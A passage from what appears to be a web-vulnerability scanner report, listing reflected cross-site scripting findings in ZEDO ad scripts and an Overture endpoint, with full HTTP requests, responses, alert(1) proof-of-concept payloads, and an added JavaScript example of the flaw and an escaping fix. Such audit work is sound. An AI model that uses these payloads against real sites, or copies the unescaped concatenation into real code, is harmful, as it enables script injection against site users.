Cookie: ZFFBbh=977B826,20|121_977#0; ZFFAbh=977B826,20|121_977#365; FFBbh=977B305,20|149_1#0; FFgeo=5386156; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=305:3654a';alert(1)//60894199582,a877b';expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=305,825,15:305,825,0:0,825,15:305,0,15:0,0,0;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=94:4:4:0:1;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "8710bb37-8952-4aa4e77af70c0"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=210
Expires: Sun, 04 Sep 2011 01:08:03 GMT
Date: Sun, 04 Sep 2011 01:04:33 GMT
Content-Length: 970
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=263;var zzPat='3654a';alert(1)//60894199582,a877b'';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=3654a';alert(1)//60894199582,a877b';z="+Math.random();}

if(zzuid=='unknown')zzuid='k5xiThcyanucBq9IXvhSGSz5~090311'
...[SNIP]...

5.25. http://c7.zedo.com/bar/v16-504/c5/jsc/fm.js [$ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-504/c5/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 90cbc"-alert(1)-"db48eb64b4f was submitted in the $ parameter. This input was echoed unmodified in the application's response.

The break-out is in the second reflection, var zzStr="q=90cbc"-alert(1)-"db48eb64b4f,...";, where the reflected double quote closes the literal and "-alert(1)-" turns the line into a subtraction expression that calls alert(1) while leaving the statement syntactically valid; the first reflection, into the single-quoted zzPat, is inert for this payload. The extra ,2f1b3%22%3b1567743ee5c,2f1b3" after the payload in both the FFpb cookie and the script is residue from an earlier probe, not something this request sent.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-504/c5/jsc/fm.js?c=825/403/1&a=0&f=&n=305&r=13&d=15&q=&$=90cbc"-alert(1)-"db48eb64b4f&s=263&z=0.7735994893591851 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZFFBbh=977B826,20|121_977#0; ZFFAbh=977B826,20|121_977#365; FFBbh=977B305,20|149_1#0; FFgeo=5386156; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=305:90cbc"-alert(1)-"db48eb64b4f,2f1b3%22%3b1567743ee5c,2f1b3";expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=305,825,15:305,825,0:0,825,15:305,0,15:0,0,0;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=92:4:4:0:1;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "8710bb37-8952-4aa4e77af70c0"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=210
Expires: Sun, 04 Sep 2011 01:08:03 GMT
Date: Sun, 04 Sep 2011 01:04:33 GMT
Content-Length: 1016
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=263;var zzPat='90cbc"-alert(1)-"db48eb64b4f,2f1b3%22%3b1567743ee5c,2f1b3"';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=90cbc"-alert(1)-"db48eb64b4f,2f1b3%22%3b1567743ee5c,2f1b3";z="+Math.random();}

if(zzuid=='unknown')zzuid='k5xiThcyanucBq9IXvhSGSz5~090311';

var zzhasAd=undefined;
var zzpixie = new Image();
var zzRandom = Math.random();
var zzD
...[SNIP]...

5.26. http://c7.zedo.com/bar/v16-504/c5/jsc/fm.js [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-504/c5/jsc/fm.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d3d47'-alert(1)-'252696a21cc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This reflection is on the error path: when the query string is not one fm.js recognises, the script builds the URL of an ERR.gif diagnostic beacon and appends the raw query string as qs=...; the single quote in the parameter name closes that literal, so the y10.src assignment evaluates '...qs=d3d47'-alert(1)-'252696a21cc=1;' and calls alert(1). Any unrecognised query string is reflected into this beacon URL, so the name does not have to resemble a real parameter.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-504/c5/jsc/fm.js?d3d47'-alert(1)-'252696a21cc=1 HTTP/1.1
Host: c7.zedo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 1017
Content-Type: application/x-javascript
Set-Cookie: FFad=17:12:9:9:1;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=0,0,0:305,825,15:305,825,0:0,825,15:305,0,15;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "8710bb37-8952-4aa4e77af70c0"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=207
Expires: Sun, 04 Sep 2011 01:25:35 GMT
Date: Sun, 04 Sep 2011 01:22:08 GMT
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();

y10.src='http://r1.zedo.com/ads2/p/'+Math.random()+'/ERR.gif?v=bar/v16-504/c5;referrer='+document.referrer+';tag=c7.zedo.com/bar/v16-504/c5/jsc/fm.js;qs=d3d47'-alert(1)-'252696a21cc=1;';

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=0;var zzPat='';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=;z="+Math.
...[SNIP]...

5.27. http://c7.zedo.com/bar/v16-504/c5/jsc/fm.js [q parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-504/c5/jsc/fm.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1609e'%3balert(1)//f15cbe80920 was submitted in the q parameter. This input was echoed as 1609e';alert(1)//f15cbe80920 in the application's response.

This is the same break-out as the $ parameter: the reflected quote closes the zzPat literal, alert(1) runs as a statement and // hides the remainder of the line. Note what else appears in zzPat: after the q payload the server has appended 609c0'-alert(1)-'ce33e99e75d,1726d%27%3b9f644ea3489,1726d', two payloads from earlier $ probes that this request never sent (its $ was empty and it carried no FFpb cookie), and the FFpb Set-Cookie header carries the same replayed values. The host is therefore persisting injected values server-side and re-emitting them in later script responses, which turns this reflected issue into a stored one for the affected client.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-504/c5/jsc/fm.js?c=825/403/1&a=0&f=&n=305&r=13&d=15&q=1609e'%3balert(1)//f15cbe80920&$=&s=263&z=0.7735994893591851 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZFFBbh=977B826,20|121_977#0; ZFFAbh=977B826,20|121_977#365; FFBbh=977B305,20|149_1#0; FFgeo=5386156; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=305:609c0'-alert(1)-'ce33e99e75d,1726d%27%3b9f644ea3489,1726d';expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=305,825,15:305,825,0:0,825,15:305,0,15:0,0,0;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=84:4:4:0:1;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "8710bb37-8952-4aa4e77af70c0"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=210
Expires: Sun, 04 Sep 2011 01:08:03 GMT
Date: Sun, 04 Sep 2011 01:04:33 GMT
Content-Length: 1074
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=263;var zzPat='1609e';alert(1)//f15cbe80920,609c0'-alert(1)-'ce33e99e75d,1726d%27%3b9f644ea3489,1726d'';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=1609e';alert(1)//f15cbe80920,609c0'-alert(1)-'ce33e99e75d,1726d%
...[SNIP]...

5.28. http://c7.zedo.com/bar/v16-504/c5/jsc/fmr.js [$ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-504/c5/jsc/fmr.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b2602'%3balert(1)//50efe9478c4 was submitted in the $ parameter. This input was echoed as b2602';alert(1)//50efe9478c4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-504/c5/jsc/fmr.js?c=825/403/1&a=0&f=&n=305&r=13&d=15&q=&$=b2602'%3balert(1)//50efe9478c4&s=263&z=0.7735994893591851 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZFFBbh=977B826,20|121_977#0; ZFFAbh=977B826,20|121_977#365; FFBbh=977B305,20|149_1#0; FFgeo=5386156; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=305:b2602';alert(1)//50efe9478c4,54f5b;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=305,825,15:305,825,0:0,825,15:305,0,15:0,0,0;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=36:9:9:1:1;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "cff199-8747-4aa4e7838c500"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=192
Expires: Sun, 04 Sep 2011 01:08:03 GMT
Date: Sun, 04 Sep 2011 01:04:51 GMT
Content-Length: 968
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=263;var zzPat='b2602';alert(1)//50efe9478c4,54f5b';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=b2602';alert(1)//50efe9478c4,54f5b;z="+Math.random();}

if(zzuid=='unknown')zzuid='k5xiThcyanucBq9IXvhSGSz5~090311';

...[SNIP]...

5.29. http://c7.zedo.com/bar/v16-504/c5/jsc/fmr.js [$ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-504/c5/jsc/fmr.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string literal encapsulated in double quotation marks (the zzStr assignment). The payload 9b766"%3balert(1)//2264924547d was submitted in the $ parameter and was echoed as 9b766";alert(1)//2264924547d in the application's response. The same value also appears inside the single-quoted zzPat literal, where a double quote is inert; the break-out happens in zzStr. The value is reflected unencoded in the FFpb Set-Cookie header as well (see 4.2).

This proof of concept demonstrates that arbitrary JavaScript can be injected into the application's response. Because the response is served as application/x-javascript, the injected code runs only when a page loads this URL through a script element, and it then executes in that page's origin; a browser navigated to the URL directly displays it as text.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-504/c5/jsc/fmr.js?c=825/403/1&a=0&f=&n=305&r=13&d=15&q=&$=9b766"%3balert(1)//2264924547d&s=263&z=0.7735994893591851 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZFFBbh=977B826,20|121_977#0; ZFFAbh=977B826,20|121_977#365; FFBbh=977B305,20|149_1#0; FFgeo=5386156; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=305:9b766";alert(1)//2264924547d,54f5b;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=305,825,15:305,825,0:0,825,15:305,0,15:0,0,0;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=34:9:9:1:1;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "cff199-8747-4aa4e7838c500"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=192
Expires: Sun, 04 Sep 2011 01:08:03 GMT
Date: Sun, 04 Sep 2011 01:04:51 GMT
Content-Length: 968
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=263;var zzPat='9b766";alert(1)//2264924547d,54f5b';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=9b766";alert(1)//2264924547d,54f5b;z="+Math.random();}

if(zzuid=='unknown')zzuid='k5xiThcyanucBq9IXvhSGSz5~090311';

var zzhasAd=undefined;
var zzpixie = new Image();
var zzRandom = Math.random();
var zzDate = new Date();
var zz
...[SNIP]...

5.30. http://c7.zedo.com/bar/v16-504/c5/jsc/fmr.js [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-504/c5/jsc/fmr.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string literal encapsulated in single quotation marks. In this response, sent without the parameters the script normally expects, fmr.js builds an error-beacon URL (ERR.gif) assigned to y10.src, and the qs= field of that single-quoted URL contains the entire raw query string, so any parameter name or value reaches script context. The payload 764dd'-alert(1)-'b14c84fceac was submitted as the name of an arbitrarily supplied request parameter and was echoed unmodified in the application's response. The '-alert(1)-' form closes the literal and splices the call in as an operand of a subtraction, which keeps the surrounding expression syntactically valid so the statement still executes.

This proof of concept demonstrates that arbitrary JavaScript can be injected into the application's response. Because the response is served as application/x-javascript, the injected code runs only when a page loads this URL through a script element, and it then executes in that page's origin; a browser navigated to the URL directly displays it as text.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-504/c5/jsc/fmr.js?764dd'-alert(1)-'b14c84fceac=1 HTTP/1.1
Host: c7.zedo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 1018
Content-Type: application/x-javascript
Set-Cookie: FFad=12:12:9:9:1;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=0,0,0:305,825,15:305,825,0:0,825,15:305,0,15;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "cff199-8747-4aa4e7838c500"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=207
Expires: Sun, 04 Sep 2011 01:25:35 GMT
Date: Sun, 04 Sep 2011 01:22:08 GMT
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();

y10.src='http://r1.zedo.com/ads2/p/'+Math.random()+'/ERR.gif?v=bar/v16-504/c5;referrer='+document.referrer+';tag=c7.zedo.com/bar/v16-504/c5/jsc/fmr.js;qs=764dd'-alert(1)-'b14c84fceac=1;';

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=0;var zzPat='';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=;z="+Math.
...[SNIP]...

5.31. http://c7.zedo.com/bar/v16-504/c5/jsc/fmr.js [q parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-504/c5/jsc/fmr.js

Issue detail

The value of the q request parameter is copied into a JavaScript string literal encapsulated in double quotation marks (the zzStr assignment). The payload 33515"%3balert(1)//6ad1a189d09 was submitted in the q parameter and was echoed as 33515";alert(1)//6ad1a189d09 in the application's response. The same value also appears inside the single-quoted zzPat literal, where a double quote is inert; the break-out happens in zzStr.

This proof of concept demonstrates that arbitrary JavaScript can be injected into the application's response. Because the response is served as application/x-javascript, the injected code runs only when a page loads this URL through a script element, and it then executes in that page's origin; a browser navigated to the URL directly displays it as text.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-504/c5/jsc/fmr.js?c=825/403/1&a=0&f=&n=305&r=13&d=15&q=33515"%3balert(1)//6ad1a189d09&$=&s=263&z=0.7735994893591851 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZFFBbh=977B826,20|121_977#0; ZFFAbh=977B826,20|121_977#365; FFBbh=977B305,20|149_1#0; FFgeo=5386156; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=305:54f5b;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=305,825,15:305,825,0:0,825,15:305,0,15:0,0,0;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=26:9:9:1:1;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "cff199-8747-4aa4e7838c500"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=192
Expires: Sun, 04 Sep 2011 01:08:03 GMT
Date: Sun, 04 Sep 2011 01:04:51 GMT
Content-Length: 968
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=263;var zzPat='33515";alert(1)//6ad1a189d09,54f5b';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=33515";alert(1)//6ad1a189d09,54f5b;z="+Math.random();}

if(zzuid=='unknown')zzuid='k5xiThcyanucBq9IXvhSGSz5~090311';

var zzhasAd=undefined;
var zzpixie = new Image();
var zzRandom = Math.random();
var zzDate = new Date();
var zz
...[SNIP]...

5.32. http://c7.zedo.com/bar/v16-504/c5/jsc/fmr.js [q parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-504/c5/jsc/fmr.js

Issue detail

The value of the q request parameter is copied into a JavaScript string literal encapsulated in single quotation marks. The payload 9627f'%3balert(1)//e9576e37d36 was submitted in the q parameter and was echoed as 9627f';alert(1)//e9576e37d36 in the application's response: the single quote closes the zzPat literal, the semicolon ends the statement, and the trailing // comments out the remainder of the line. The value is reused in the double-quoted zzStr literal on the next line, where a single quote is inert.

This proof of concept demonstrates that arbitrary JavaScript can be injected into the application's response. Because the response is served as application/x-javascript, the injected code runs only when a page loads this URL through a script element, and it then executes in that page's origin; a browser navigated to the URL directly displays it as text.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-504/c5/jsc/fmr.js?c=825/403/1&a=0&f=&n=305&r=13&d=15&q=9627f'%3balert(1)//e9576e37d36&$=&s=263&z=0.7735994893591851 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZFFBbh=977B826,20|121_977#0; ZFFAbh=977B826,20|121_977#365; FFBbh=977B305,20|149_1#0; FFgeo=5386156; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=305:54f5b;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=305,825,15:305,825,0:0,825,15:305,0,15:0,0,0;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=28:9:9:1:1;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "cff199-8747-4aa4e7838c500"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=192
Expires: Sun, 04 Sep 2011 01:08:03 GMT
Date: Sun, 04 Sep 2011 01:04:51 GMT
Content-Length: 968
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=263;var zzPat='9627f';alert(1)//e9576e37d36,54f5b';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=9627f';alert(1)//e9576e37d36,54f5b;z="+Math.random();}

if(zzuid=='unknown')zzuid='k5xiThcyanucBq9IXvhSGSz5~090311';

...[SNIP]...
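
The concatenation behind findings 5.28 to 5.32, reproduced offline as an added example that is not part of the original report and not ZEDO's code. vulnerableScript() builds the two assignments in the same shape as the fmr.js output (a single-quoted zzPat literal on one line, a double-quoted zzStr literal on the next); runScript() evaluates a generated script with a stub standing in for alert() so the effect of a payload can be checked in Node.js; jsStringLiteral() and hardenedScript() are an assumed fix, not code from the scanned endpoint. The payloads are the ones from 5.28 and 5.29.

```javascript
// Added example for findings 5.28 to 5.32 (not ZEDO's code). The endpoint
// concatenates a query parameter into JavaScript source; this reproduces
// that shape and contrasts it with a safe serialisation.

// Mirrors the vulnerable fmr.js output: the value lands in a single-quoted
// literal on one line and in a double-quoted literal on the next.
function vulnerableScript(value) {
  return "var zzPat='" + value + "';\n" +
         'var zzStr="q=' + value + ';z=0";';
}

// Assumed fix: serialise as a JSON string literal, then escape the characters
// JSON leaves alone but a script or HTML parser cares about (< > & / and the
// line terminators U+2028 / U+2029). The result cannot end the literal and
// cannot close a </script> element either.
function jsStringLiteral(value) {
  return JSON.stringify(String(value)).replace(/[<>&\/\u2028\u2029]/g, function (c) {
    return '\\u' + c.charCodeAt(0).toString(16).padStart(4, '0');
  });
}

function hardenedScript(value) {
  var lit = jsStringLiteral(value);
  return 'var zzPat=' + lit + ';\n' +
         'var zzStr="q="+' + lit + '+";z=0";';
}

// Evaluates a generated script with a spy standing in for alert(). Returns
// the resulting zzPat and zzStr values and how many times alert() was hit.
function runScript(script) {
  var calls = [];
  var fn = new Function('alert', script + '\nreturn {zzPat: zzPat, zzStr: zzStr};');
  var result = fn(function (arg) { calls.push(arg); });
  result.alerts = calls.length;
  return result;
}

// Payloads taken from findings 5.28 and 5.29.
var SINGLE_QUOTE_PAYLOAD = "b2602';alert(1)//50efe9478c4";
var DOUBLE_QUOTE_PAYLOAD = '9b766";alert(1)//2264924547d';

// Usage: node this_file.js
console.log(runScript(vulnerableScript(SINGLE_QUOTE_PAYLOAD)).alerts);  // 1
console.log(runScript(vulnerableScript(DOUBLE_QUOTE_PAYLOAD)).alerts);  // 1
console.log(runScript(hardenedScript(SINGLE_QUOTE_PAYLOAD)).alerts);    // 0
```

The two vulnerable runs show why a quote-specific filter is not a fix: the single-quote payload breaks out of zzPat and the double-quote payload breaks out of zzStr, so the value has to be safe in both literals at once, which the JSON-plus-escape serialisation achieves without knowing which delimiter surrounds it.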

5.33. http://cm.npc-mcclatchy.overture.com/js_1_0/ [css_url parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cm.npc-mcclatchy.overture.com
Path:   /js_1_0/

Issue detail

The value of the css_url request parameter is copied into the href attribute of a <link> element, encapsulated in double quotation marks. The payload 17667"><script>alert(1)</script>0f9450ed1bb was submitted in the css_url parameter and was echoed unmodified in the application's response: the double quote closes the attribute value, the > closes the element, and the script element that follows is parsed as markup.

This proof of concept demonstrates that arbitrary JavaScript can be injected into the application's response. Unlike the fmr.js findings above, this response is served as text/html, so the payload executes when the crafted URL is opened directly in a browser. Since the parameter is a stylesheet URL, validating it as an absolute http(s) URL on an expected host is worthwhile, but attribute encoding of the emitted value is still required: a URL on the expected host can carry these characters in its path, as this payload does.

Request

